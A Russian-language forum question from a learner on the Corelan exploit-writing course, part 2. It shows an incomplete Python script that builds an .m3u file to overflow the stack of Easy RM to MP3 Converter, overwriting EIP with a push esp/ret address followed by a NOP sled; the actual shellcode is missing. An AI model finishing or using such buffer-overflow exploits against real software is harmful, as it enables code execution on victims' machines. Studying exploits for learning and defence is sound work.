Я делаю курс Corelan, но я застрял в уроке № 2 push ret Я пытаюсь перезаписать свой eip с помощью push esp ret, чтобы запустить мой шелл-код в этом случае calc.exe, но он всегда перезаписывается с помощью nops , Я думаю, что код правильный, но мне чего-то не хватает.
payload = junk+eip+prependesp+shellcode
структура эксплойта
#!/usr/bin/env python
import struct
# Popcalc for Easy RM to MP3 Converter
#
# Corelan Exploit Writing Tutorial 2
outfile = 'popcalc_exploit_push_ret.m3u'
# Just some junk at the beginning
junk = '\x41' * 26066
#018757F6 54 PUSH ESP
#018757F7 C3 RETN
eip = struct.pack("<L",0x018757F6) # overwrite EIP with push esp, ret
# Some junk so ESP points to shellcode
prependesp = 'B' * 4
# nop sled
shellcode = '\x90' * 25
#real shellcode
shellcode = shellcode
push_ret
результаты необходимо перезаписать EIP с помощью push esp, ret и затем запустить calc, но это не работает. он всегда перезаписывается с остановкой на nops